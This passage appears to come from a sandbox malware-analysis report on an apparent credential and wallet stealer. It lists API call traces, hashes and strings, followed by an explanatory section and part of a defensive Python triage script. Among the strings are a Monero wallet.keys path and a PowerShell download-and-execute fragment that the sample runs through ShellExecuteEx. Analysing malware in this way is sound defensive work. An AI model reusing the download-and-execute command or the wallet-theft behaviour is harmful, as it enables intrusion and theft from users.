                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 20fb83290d27515c5cb833d465153d4d8f3edb6cf98f5822d08c309222b4d253
                              • Instruction ID: 5223682cd57101545691c4dd22ed5e2af83d50fb82c71c8f2241a132c612044e
                              • Opcode Fuzzy Hash: 20fb83290d27515c5cb833d465153d4d8f3edb6cf98f5822d08c309222b4d253
                              • Instruction Fuzzy Hash: 4931E4B4A40218ABDB24CF54DC85BDCB7B4EB48704F1081D9EA09B7281C7B06A899F99
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00338426
                              • wsprintfA.USER32 ref: 00338459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0033847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0033848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00338499
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0109E4E8,00000000,000F003F,?,00000400), ref: 003384EC
                              • lstrlen.KERNEL32(?), ref: 00338501
                              • RegQueryValueExA.ADVAPI32(00000000,0109E5D8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00340B34), ref: 00338599
                              • RegCloseKey.ADVAPI32(00000000), ref: 00338608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0033861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                               • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 22c11f3eb0477ac849e07cde9c83b44e7ab97bc94fdfcb61594909cabbe9f3c3
                              • Instruction ID: 00e7cfee5ee5bdb39d2f389982868581bec1bbaa500c747f09ec9982668bb224
                              • Opcode Fuzzy Hash: 22c11f3eb0477ac849e07cde9c83b44e7ab97bc94fdfcb61594909cabbe9f3c3
                              • Instruction Fuzzy Hash: 1E21E7B1910218ABDB24DF54DC85FE9B7B8FB48700F00C598E649A7140DF75AA85CFD4
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003376A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003376AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0108C390,00000000,00020119,00000000), ref: 003376DD
                              • RegQueryValueExA.ADVAPI32(00000000,0109E4A0,00000000,00000000,?,000000FF), ref: 003376FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 00337708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 2abe27fd60350da8d667fad436a81ba6b1eb7e6f0df4a243ab54921a44c21888
                              • Instruction ID: 6bfc52a2ee106c065232ad322ec67abf80a6bd8d60ed4ea912c976fd76cc631f
                              • Opcode Fuzzy Hash: 2abe27fd60350da8d667fad436a81ba6b1eb7e6f0df4a243ab54921a44c21888
                              • Instruction Fuzzy Hash: 1F0162B5A04208BBEB10DBE8DD89F7DB7BCEB58701F104454FA05E7291E6B4A908DF51
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00337734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0033773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0108C390,00000000,00020119,003376B9), ref: 0033775B
                              • RegQueryValueExA.ADVAPI32(003376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0033777A
                              • RegCloseKey.ADVAPI32(003376B9), ref: 00337784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 9073b7f03a7eb4df39f4eb9e1cf855925d54e2dd29f7acaf10c785ffc0e82423
                              • Instruction ID: df0f8750968fcea1f31a13afd118f0013472314c4b35d9abb1a3c6132955def1
                              • Opcode Fuzzy Hash: 9073b7f03a7eb4df39f4eb9e1cf855925d54e2dd29f7acaf10c785ffc0e82423
                              • Instruction Fuzzy Hash: 320117B5A40308BBD710DFE4DC4AFAEB7B8EB54701F104555FA05B7281D7B065449F51
                              APIs
                              • CreateFileA.KERNEL32(:3,80000000,00000003,00000000,00000003,00000080,00000000,?,00333AEE,?), ref: 003392FC
                              • GetFileSizeEx.KERNEL32(000000FF,:3), ref: 00339319
                              • CloseHandle.KERNEL32(000000FF), ref: 00339327
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID: :3$:3
                              • API String ID: 1378416451-2957867591
                              • Opcode ID: 4653f0f3955070e16d41d061285699f9c2aee29a36e0234600b2760fa178cf3b
                              • Instruction ID: 4e5b990b781cda50d991b6537404b4272a3909682588a427b482efd3682ed003
                              • Opcode Fuzzy Hash: 4653f0f3955070e16d41d061285699f9c2aee29a36e0234600b2760fa178cf3b
                              • Instruction Fuzzy Hash: BEF08C78E00208FBDB20DBB4DC88B9E77B9EB58320F108254F611A72C0E6B096009F41
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003299EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00329A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00329A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,0032148F,00000000), ref: 00329A5A
                              • LocalFree.KERNEL32(0032148F), ref: 00329A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00329A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 36a711cd8a139a94331019fb7f99801dda475c719c758b8b60ae6d40c60165ff
                              • Instruction ID: 4f594e4bc28e62a93840b53b1eb26426034b6ca9d699fa0fac3059772b95dc37
                              • Opcode Fuzzy Hash: 36a711cd8a139a94331019fb7f99801dda475c719c758b8b60ae6d40c60165ff
                              • Instruction Fuzzy Hash: C4314BB4A00309EFDB15CF98D885BEE77B9FF48300F108159E901AB290D778AA45DFA1
                              APIs
                              • lstrcat.KERNEL32(?,0109E080), ref: 003347DB
                                • Part of subcall function 00338DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00338E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00334801
                              • lstrcat.KERNEL32(?,?), ref: 00334820
                              • lstrcat.KERNEL32(?,?), ref: 00334834
                              • lstrcat.KERNEL32(?,0108B6F8), ref: 00334847
                              • lstrcat.KERNEL32(?,?), ref: 0033485B
                              • lstrcat.KERNEL32(?,0109DD80), ref: 0033486F
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 00338D90: GetFileAttributesA.KERNEL32(00000000,?,00321B54,?,?,0034564C,?,?,00340E1F), ref: 00338D9F
                                • Part of subcall function 00334570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00334580
                                • Part of subcall function 00334570: RtlAllocateHeap.NTDLL(00000000), ref: 00334587
                                • Part of subcall function 00334570: wsprintfA.USER32 ref: 003345A6
                                • Part of subcall function 00334570: FindFirstFileA.KERNEL32(?,?), ref: 003345BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: f3f2ba30449734142c5d873ecf086890c6b6a487ddd28caaacb3ee26d544da99
                              • Instruction ID: f1c4a69c01705c732102e475f28c61c84d2de64352b808a5b6c2513cc4c3f247
                              • Opcode Fuzzy Hash: f3f2ba30449734142c5d873ecf086890c6b6a487ddd28caaacb3ee26d544da99
                              • Instruction Fuzzy Hash: 913130B690031867CB16FBA0DCC5EED737CAB58700F404589B359AB091EEB4E6898F95
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00332D85
                              Strings
                              • <, xrefs: 00332D39
                              • ')", xrefs: 00332CB3
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00332CC4
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00332D04
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 81c75ad959495d2ff31616ae5a71e73f44759a1bd20c7f7326e264794e4b8212
                              • Instruction ID: a1c6eed00aa33b1c83be493c3f1012d84f66ac6126b5ca623d61e1f83f579cf2
                              • Opcode Fuzzy Hash: 81c75ad959495d2ff31616ae5a71e73f44759a1bd20c7f7326e264794e4b8212
                              • Instruction Fuzzy Hash: 6441AF71D10608AADB1AEFA0C8D2BDDBB74AF14300F504119F156BF191DF746A8ADF92
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00329F41
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: e1f4b6b50fc85bdf12e54b098c2a782d13fd99280a656482c1a0fc8d679e0f11
                              • Instruction ID: a5410256b9b21942cbf67d1682ebfcc0613ab0c75eec18857eb364cbb996715c
                              • Opcode Fuzzy Hash: e1f4b6b50fc85bdf12e54b098c2a782d13fd99280a656482c1a0fc8d679e0f11
                              • Instruction Fuzzy Hash: A5616E70A10618EFDB29EFA4DD96FED77B9AF44300F008018F94A5F191EB746A45CB92
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,0109DBA0,00000000,00020119,?), ref: 003340F4
                              • RegQueryValueExA.ADVAPI32(?,0109DFD8,00000000,00000000,00000000,000000FF), ref: 00334118
                              • RegCloseKey.ADVAPI32(?), ref: 00334122
                              • lstrcat.KERNEL32(?,00000000), ref: 00334147
                              • lstrcat.KERNEL32(?,0109E020), ref: 0033415B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: d639921bf1bfa1da8f0700c60b03a8c187d58c5aa74b2a459e088fe7a5894af9
                              • Instruction ID: 4873f184f47159820b18be813473477cae80ed9fd6cff0509b3f489c1719522f
                              • Opcode Fuzzy Hash: d639921bf1bfa1da8f0700c60b03a8c187d58c5aa74b2a459e088fe7a5894af9
                              • Instruction Fuzzy Hash: 8B418AB6D001086BDB15EBA4EC96FFE733DAB98300F008558F6155B181EAB55B8C8FD2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00337E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00337E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0108C0F0,00000000,00020119,?), ref: 00337E5E
                              • RegQueryValueExA.ADVAPI32(?,0109DAA0,00000000,00000000,000000FF,000000FF), ref: 00337E7F
                              • RegCloseKey.ADVAPI32(?), ref: 00337E92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 11a98cff7ae748eb1872b74e66dc753137845147af4616cfb09dcd17a7ca337c
                              • Instruction ID: e430d9b48562c98d9f136358e823f1725f341ba0a62a87f08647b5522a23a7fa
                              • Opcode Fuzzy Hash: 11a98cff7ae748eb1872b74e66dc753137845147af4616cfb09dcd17a7ca337c
                              • Instruction Fuzzy Hash: 01114CB1A44205EBDB14CF98DD89FBBBBBCEB44B11F104159F605A7680D7B468049FA2
                              APIs
                              • StrStrA.SHLWAPI(0109DF30,?,?,?,0033140C,?,0109DF30,00000000), ref: 0033926C
                              • lstrcpyn.KERNEL32(0056AB88,0109DF30,0109DF30,?,0033140C,?,0109DF30), ref: 00339290
                              • lstrlen.KERNEL32(?,?,0033140C,?,0109DF30), ref: 003392A7
                              • wsprintfA.USER32 ref: 003392C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: f1ca2a821d77d8ce95701da9813a02cada1638ebeb1fadd11f7ba59ff0c45fbf
                              • Instruction ID: 417561403bfe0f725fa7ff16b3ade4b312399ac2d67f89a7378e65eaddddcd42
                              • Opcode Fuzzy Hash: f1ca2a821d77d8ce95701da9813a02cada1638ebeb1fadd11f7ba59ff0c45fbf
                              • Instruction Fuzzy Hash: 5001D675600208FFCB44DFECC988EAE7BB9FB58355F148548F909AB214C671AA44EF91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003212B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003212BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003212D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003212F5
                              • RegCloseKey.ADVAPI32(?), ref: 003212FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 3b32dafefba1d0db441f808ca405ca0705d0c24d12179469fbe53b74680635c5
                              • Instruction ID: 271877e85a65e0af3f6863de87ad6166cbdb95b5aeb399d29babc72aae77dada
                              • Opcode Fuzzy Hash: 3b32dafefba1d0db441f808ca405ca0705d0c24d12179469fbe53b74680635c5
                              • Instruction Fuzzy Hash: 910136B5A40208BBDB10DFD4DC49FAEB7B8EB58701F008155FA05A7280D6B0AA059F51
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
                              • String ID:
                              • API String ID: 2109742289-3916222277
                              • Opcode ID: c8472546c2ae59eff46ab83f915cfddc1c114552bd039e380dc22b2503e704ed
                              • Instruction ID: dd12a6c9c0d59194a9a879bc2eb290a08f0741483c86b1cadf69313fb584b6f2
                              • Opcode Fuzzy Hash: c8472546c2ae59eff46ab83f915cfddc1c114552bd039e380dc22b2503e704ed
                              • Instruction Fuzzy Hash: 1741F5B151079C5EDB228B248CD5FFBBBECAB45704F1454E8E9CA9A182D3719A44CF60
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00336663
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00336726
                              • ExitProcess.KERNEL32 ref: 00336755
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: 54b3e875193296a488ef9c7d060ab4d951b052d801f3a440786a1806e6e17fd5
                              • Instruction ID: 9149965f0688fcbdc4505a60c7e9ec5d4c044cbb2cb792289eed263a2c53eb08
                              • Opcode Fuzzy Hash: 54b3e875193296a488ef9c7d060ab4d951b052d801f3a440786a1806e6e17fd5
                              • Instruction Fuzzy Hash: 52312BB1801218AADB15EB94DCD2BDEB778AF14300F404189F20A7B191DFB46B49CF66
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00340E28,00000000,?), ref: 0033882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00338836
                              • wsprintfA.USER32 ref: 00338850
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: f0bb4925639fdb8e4c397b8cb5dc1d1fb41009f7f59f3343846c24a46aecd33b
                              • Instruction ID: f963552c2b03e1fa9d6aaed800bed50b57362d6e82722700b644fce5bf82b9cd
                              • Opcode Fuzzy Hash: f0bb4925639fdb8e4c397b8cb5dc1d1fb41009f7f59f3343846c24a46aecd33b
                              • Instruction Fuzzy Hash: 2D210DB1A44208AFDB04DFD8DD49FAEBBB8FB48711F104119F605B7280C7B9A9059FA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0033951E,00000000), ref: 00338D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00338D62
                              • wsprintfW.USER32 ref: 00338D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: c22e63b084d662960c6b73e057723ecb46adcb97024669b21f22b90614daac2f
                              • Instruction ID: 4eb3200d18d1f1122674d559959610b96d944b21c20a5a956a6222ee065b5e5a
                              • Opcode Fuzzy Hash: c22e63b084d662960c6b73e057723ecb46adcb97024669b21f22b90614daac2f
                              • Instruction Fuzzy Hash: A6E0E675A50208BFD714DB98DD09E5977B8EB54702F004154FD0AA7240D9B16E149F56
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 00338B60: GetSystemTime.KERNEL32(00340E1A,0109A450,003405AE,?,?,003213F9,?,0000001A,00340E1A,00000000,?,01099048,?,\Monero\wallet.keys,00340E17), ref: 00338B86
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0032A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0032A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0032A6BC
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0032A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: a1f6dcdc3d68dd35472230b4d4b74c0ba81c016ba578cee1e7c96dc9b0a99ee2
                              • Instruction ID: 199e237f8ae2b8e866f75abae4af091f9ac344f6a32f563304797550b0b3d14e
                              • Opcode Fuzzy Hash: a1f6dcdc3d68dd35472230b4d4b74c0ba81c016ba578cee1e7c96dc9b0a99ee2
                              • Instruction Fuzzy Hash: F2E10E72810508ABCB06FBA4DCD2EEE7738AF24300F508159F557BA091EF746A4DDB62
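The API lists above are per-function call traces: each bullet is one imported API with the argument DWORDs Joe Sandbox could resolve (unresolved ones print as ?) and the address of the call site. Most of the meaning sits in the raw constants. RegOpenKeyExA(80000002, ..., 00020119, ...) opens a key under HKEY_LOCAL_MACHINE with KEY_READ plus KEY_WOW64_64KEY (0x0100), so the 32-bit sample asks for the native 64-bit hive rather than the WOW6432Node view; CopyFileA(..., 00000001) passes bFailIfExists = TRUE; and the \Monero\wallet.keys string in the lstrlen subcall shows which file the CopyFileA/DeleteFileA function is handling. The script below is an added example written for this page, not Joe Sandbox or Stealc code: it parses a constructed excerpt of those bullet lines, decodes the registry constants, and tags call patterns (registry-read, copy-then-delete, wallet-file-reference, heap-format-string). The tag names and the heuristics behind them are assumptions of the example, not report output.

```python
"""Triage helper for the per-function API traces Joe Sandbox prints.

Added example for this report, not Joe Sandbox code. It parses lines of the
form "• Api.MODULE(args), ref: addr", decodes the raw registry constants and
tags call patterns a stealer analyst cares about. The tag names and the
heuristics are this example's own assumptions.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: API lines copied from three functions in this report
# (registry read, wallet-file copy/delete, heap allocation + wsprintfA).
SAMPLE_TRACE = r"""
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 00337E37
• RtlAllocateHeap.NTDLL(00000000), ref: 00337E3E
• RegOpenKeyExA.ADVAPI32(80000002,0108C0F0,00000000,00020119,?), ref: 00337E5E
• RegQueryValueExA.ADVAPI32(?,0109DAA0,00000000,00000000,000000FF,000000FF), ref: 00337E7F
• RegCloseKey.ADVAPI32(?), ref: 00337E92
APIs
  • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0032A2E1
• lstrlen.KERNEL32(00000000,00000000), ref: 0032A3FF
• DeleteFileA.KERNEL32(00000000), ref: 0032A743
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00340E28,00000000,?), ref: 0033882F
• RtlAllocateHeap.NTDLL(00000000), ref: 00338836
• wsprintfA.USER32 ref: 00338850
"""

# Predefined HKEY roots and access-right bits from winreg.h; KEY_READ is 0x20019.
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
              0x80000005: "HKEY_CURRENT_CONFIG"}
KEY_RIGHTS = [(0x20000, "STANDARD_RIGHTS_READ"), (0x0001, "KEY_QUERY_VALUE"),
              (0x0002, "KEY_SET_VALUE"), (0x0004, "KEY_CREATE_SUB_KEY"),
              (0x0008, "KEY_ENUMERATE_SUB_KEYS"), (0x0010, "KEY_NOTIFY"),
              (0x0020, "KEY_CREATE_LINK"), (0x0100, "KEY_WOW64_64KEY"),
              (0x0200, "KEY_WOW64_32KEY")]
KEY_READ = 0x20019

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
HEX_RE = re.compile(r"[0-9A-Fa-f]{8}")


@dataclass
class Call:
    func: str
    module: str
    args: list
    ref: int
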